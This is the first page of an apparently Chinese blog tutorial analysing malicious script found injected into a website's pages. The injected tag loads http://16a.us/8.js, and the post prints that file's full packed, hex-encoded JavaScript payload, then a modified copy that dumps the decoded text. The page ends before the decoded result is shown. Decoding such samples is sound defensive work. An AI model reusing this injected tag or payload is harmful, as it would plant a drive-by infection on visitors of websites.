今天访问eqifa的官方网站,发现好多页面都带有
<scriptsrc=http://16a.us/8.js></script>
<!DOCTYPEHTMLPUBLIC"-//W3C//DTDHTML4.0Transitional//EN">
找了资料,有可能是arp欺骗导致的或真的页面都被加了代码,这个代码是病毒,我来分析下,到了最后的时候发现js是16进制的,这次是实战,每一部都会很清晰,学不会教学费呵呵
第一部,得到代码(因为是知道js文件可以直接用ie打开访问)
代码如下
复制代码 代码如下:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){returnd[e]}];e=function(){return'w+'};c=1};while(c--)if(k[c])p=p.replace(newRegExp('b'+e(c)+'b','g'),k[c]);returnp}('15("Anosr4a7jD9q74vahbOco9qB7NDqaAnDjna499n9w12sao7qnahgQ947s9a679s4iPOXco9qB7NbgiUTAnosr4a7jD9q74vahbOco9qB7NbgiUTAnosr4a7jD9q74vahb12sao7qna6Walchag6Q6Fk96asrH49lc6w6lk7Ij9kaAnrhg14ai6947s9a6C18y1d512d12m18uCJlk7Ij9nsaAhasrH49lcgJC1fy18512m18uCi6P679V6Q6mnDa119vwC12G18518518u13M1fe1fe13p13212p1fy18d1831fe12e15K15K1fe18312m1831831fy12d18G12dCi6Fk96lcmewAnosr4a7jo94k74yv4r4a7hb12e12f12M12d123185bgi6lcmejc47M779qHs74hb12312z12p18318312t125bxb12312z18312t12513M15f15513t13215313d13d1321fm13213d15p1331fm13p13p15513u1fm13t13G13315p1fm13u13u15313u13515215313f13t15d133132bgi6Fk961wlcmejz94k74LHS4o7hb15m12t12318f12e18312e1221851fy1dGbJb15m15z15G1d51d51dubxbbgi6Fk96Ewlcmejz94k74LHS4o7hb15p12512e12512f1fy1d318518f12d12p12mbxbbgi6Ej7VB4wpi61jnB4ahb15815d1d5bx6mnDa119vxugi61jc4aAhgi6lceakr4pwWalchttttgi6Fk96ewlcmejz94k74LHS4o7hb1d312318f12t18u18512t12y1281fy15212t12z12d1d318t18318512d12m15e12f12M12d123185bxbbgi6Fk96lcRrBwejW47EB4oqkvenvA49hugi6lceakr4pw6ejKsqvA10k7IhlcRrBxlceakr4pgi6EjLB4ahgiEj139q74h1j94cBnac4KnAVgi6EjEkF4Rneqv4hlceakr4pxfgi6Ejzvnc4hgi6Fk96lcZwlcmejz94k74LHS4o7hb1d312G12d12z12z1fy15p18u18u12z12t12312p18512t12e12ybxbbgi6mnDapwejKsqvA10k7IhlcRrBJC1dz1dz18318t18318512d12m13313fCxC12312m1251fy12d18G12dCgi6lcZjEI4vvy14os74hmnDapxC1fu1fe1236CJlceakr4pxbbxb12e18u12d12ybxugi6P6ok7oIhlcYg6Q6lcYwpi6PbgiUTAnosr4a7jD9q74vahbOXco9qB7Nbg")',62,68,'x5C|x78|x36|x33|x65|x34|x20|x74|x37|x72|x6E|x22|x73|x35|x46|x32|x29|x28|x3B|x2E|x61|x4D|x44|x6F|x63|x31|x69|x6D|x75|x39|x30|x6C|x3D|x2C|x45|x43|x64|x70|x27|x77|x53|x76|x38|x62|x68|x2B|x42|x4F|x41|x3E|x3C|x7D|x7B|x54|x6A|x0A|x0D|x79|x47|x2F|x49|x51|x50|x55|x66|x57|x2A|eval'.split('|'),0,{}))
这是压缩,说是加密有问题,以后我说是加密也是可以理解的
解密方法如下,我是从blueidea的return方法动手脚
returnp改成thes.value=p
eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('b'+e(c)+'b','g'),k[c]);thes.value=p}('15("Anosr4a7jD9q74vahbOco9qB7NDqaAnDjna499n9w12sao7qnahgQ947s9a679s4iPOXco9qB7NbgiUTAnosr4a7jD9q74vahbOco9qB7NbgiUTAnosr4a7jD9q74vahb12sao7qna6Walchag6Q6Fk96asrH49lc6w6lk7Ij9kaAnrhg14ai6947s9a6C18y1d512d12m18uCJlk7Ij9nsaAhasrH49lcgJC1fy18512m18uCi6P679V6Q6mnDa119vwC12G18518518u13M1fe1fe13p13212p1fy18d1831fe12e15K15K1fe18312m1831831fy12d18G12dCi6Fk96lcmewAnosr4a7jo94k74yv4r4a7hb12e12f12M12d123185bgi6lcmejc47M779qHs74hb12312z12p18318312t125bxb12312z18312t12513M15f15513t13215313d13d1321fm13213d15p1331fm13p13p15513u1fm13t13G13315p1fm13u13u15313u13515215313f13t15d133132bgi6Fk961wlcmejz94k74LHS4o7hb15m12t12318f12e18312e1221851fy1dGbJb15m15z15G1d51d51dubxbbgi6Fk96Ewlcmejz94k74LHS4o7hb15p12512e12512f1fy1d318518f12d12p12mbxbbgi6Ej7VB4wpi61jnB4ahb15815d1d5bx6mnDa119vxugi61jc4aAhgi6lceakr4pwWalchttttgi6Fk96ewlcmejz94k74LHS4o7hb1d312318f12t18u18512t12y1281fy15212t12z12d1d318t18318512d12m15e12f12M12d123185bxbbgi6Fk96lcRrBwejW47EB4oqkvenvA49hugi6lceakr4pw6ejKsqvA10k7IhlcRrBxlceakr4pgi6EjLB4ahgiEj139q74h1j94cBnac4KnAVgi6EjEkF4Rneqv4hlceakr4pxfgi6Ejzvnc4hgi6Fk96lcZwlcmejz94k74LHS4o7hb1d312G12d12z12z1fy15p18u18u12z12t12312p18512t12e12ybxbbgi6mnDapwejKsqvA10k7IhlcRrBJC1dz1dz18318t18318512d12m13313fCxC12312m1251fy12d18G12dCgi6lcZjEI4vvy14os74hmnDapxC1fu1fe1236CJlceakr4pxbbxb12e18u12d12ybxugi6P6ok7oIhlcYg6Q6lcYwpi6PbgiUTAnosr4a7jD9q74vahbOXco9qB7Nbg")',62,68,'x5C|x78|x36|x33|x65|x34|x20|x74|x37|x72|x6E|x22|x73|x35|x46|x32|x29|x28|x3B|x2E|x61|x4D|x44|x6F|x63|x31|x69|x6D|x75|x39|x30|x6C|x3D|x2C|x45|x43|x64|x70|x27|x77|x53|x76|x38|x62|x68|x2B|x42|x4F|x41|x3E|x3C|x7D|x7B|x54|x6A|x0A|x0D|x79|x47|x2F|x49|x51|x50|x55|x66|x57|x2A|eval'.split('|'),0,{}))
[Ctrl+A 全选 注:如需引入外部Js需刷新才能执行]
当前1/3页123下一页阅读全文